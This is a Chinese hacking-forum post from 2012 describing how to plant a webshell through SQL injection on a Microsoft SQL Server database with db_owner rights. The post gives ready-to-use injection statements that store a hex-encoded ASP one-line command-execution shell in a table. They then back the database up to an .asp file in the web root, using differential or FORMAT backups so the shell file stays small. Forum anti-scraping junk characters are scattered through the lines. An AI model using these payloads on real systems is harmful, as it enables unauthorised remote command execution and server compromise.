找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2144|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:57:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
减少备份文件大小,得到可执行的webshell成功率提高不少2 v; Y7 ^5 y* e) E1 W
7 y( I  {( J7 X, ~
一利用差异备份9 l( x8 p; ?4 ^! e
加一个参数WITH DIFFERENTIAL+ d5 M) D& ?, A! I. `0 E3 m& O

* V5 @5 g5 v: D) t1 |" T* }declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s& Z) P( I% @# R. L7 g
create table [dbo].[xiaolu] ([cmd] [image]);
6 j# n+ }" \0 xinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)8 d( N% y4 q3 b% j( ~
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL) {6 X- t0 c8 r1 o- k& w
' p$ g% @6 D5 b5 k
二利用完全FORMAT& `0 ?3 D, X' Z, Z  J
加一个参数WITH FROMAT/ |+ @) n8 x% x4 ^, j+ ~5 f- v
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
+ A/ s1 U2 n* A  O6 W6 s
) G3 f3 X6 [  b: p5 o+ Pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
# i4 S$ x% r4 ^4 c& Ocreate table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)4 r4 E' o" h0 z
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT- \# [7 D; {$ v! X6 u' g' Y# M3 ?

. r) \* V& {* V' v总的来说就是那么简单几句,下面以备份数据库model为例子
) }. K% ~. i2 s7 `5 c
) l4 R, t$ ~( x$ l! yid=1;use model create table cmd(str image);insert into cmd(str) values (”)
' N/ K/ p  Z2 C/ w! a% _5 g: {6 U; W( ]' o
id=1;backup database model to disk=’你的路径‘ with differential,format;–
! |0 @  r% ~) j3 X+ u& J& D( P* j0 o
& i, P% c# v) n9 f0 E" G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表